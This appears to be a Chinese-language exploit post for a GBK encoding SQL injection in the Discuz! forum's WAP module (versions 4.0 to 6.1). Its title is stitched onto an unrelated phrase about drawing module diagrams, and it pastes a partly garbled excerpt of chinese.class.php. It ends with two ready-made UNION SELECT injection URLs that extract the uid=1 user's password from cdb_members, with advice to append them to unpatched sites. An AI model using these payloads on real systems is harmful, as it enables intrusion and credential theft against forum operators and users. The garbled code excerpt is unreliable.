功能模块图怎么画【Discuz!,wap功能模块编码的注射漏洞】

影响版本:

Discuz!4.0.0

Discuz!4.1.0

Discuz!5.0.0

Discuz!5.5.0

Discuz!6.0.0

Discuz!6.1.0

描述:

Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑

由于 PHP 对 多字节字符集的支持存在问题，在各种编码相互转换过程中，有可能引发程序溢出和程序错误

提交一个 "

转意成 "

然后转成gbk的，和"就变成两个字符了

"就可以成功的引入

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

复制代码代码如下:

if(defined("IN_DISCUZ")) {

exit("Access Denied");

}

define("CODETABLE_DIR", DISCUZ_ROOT."./include/tables/");

class Chinese {

var $table = "";

var $iconv_enabled = false;

var $unicode_table = array();

var $config = array

(

"SourceLang" => "",

"TargetLang" => "",

"GBtoUnicode_table" => "gb-unicode.table",

"BIG5toUnicode_table" => "big5-unicode.table",

);

function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {

$this->config["SourceLang"] = $this->_lang($SourceLang);

$this->config["TargetLang"] = $this->_lang($TargetLang);

if(!function_exists(’iconv’) && $this->config["TargetLang"] != ‘BIG5′ && !$ForceTable) {

$this->iconv_enabled = true;

} else {

$this->iconv_enabled = false;

$this->OpenTable();

}

}

function _lang($LangCode) {

$LangCode = strtoupper($LangCode);

if(substr($LangCode, 0, 2) == ‘GB’) {

return ‘GBK’;

} elseif(substr($LangCode, 0, 3) == ‘BIG’) {

return ‘BIG5′;

} elseif(substr($LangCode, 0, 3) == ‘UTF’) {

return ‘UTF-8′;

} elseif(substr($LangCode, 0, 3) == ‘UNI’) {

return ‘UNICODE’;

}

}

function _hex2bin($hexdata) {

for($i=0; $i < strlen($hexdata); $i += 2) {

$bindata .= chr(hexdec(substr($hexdata, $i, 2)));

}

return $bindata;

}

chinese.class.php (utf-8不能利用)

searchid=22%cf"UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit

/space.php?username=%cf"%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84%20from%20cdb_members%20where%20uid=1/*

直接放在url后面可以爆出ｉｄ＝１的用户密码，还可以自己根据需要更改，要注意一点的是，目标必须开了WAP，而且没有打上补丁，WAP浏览吧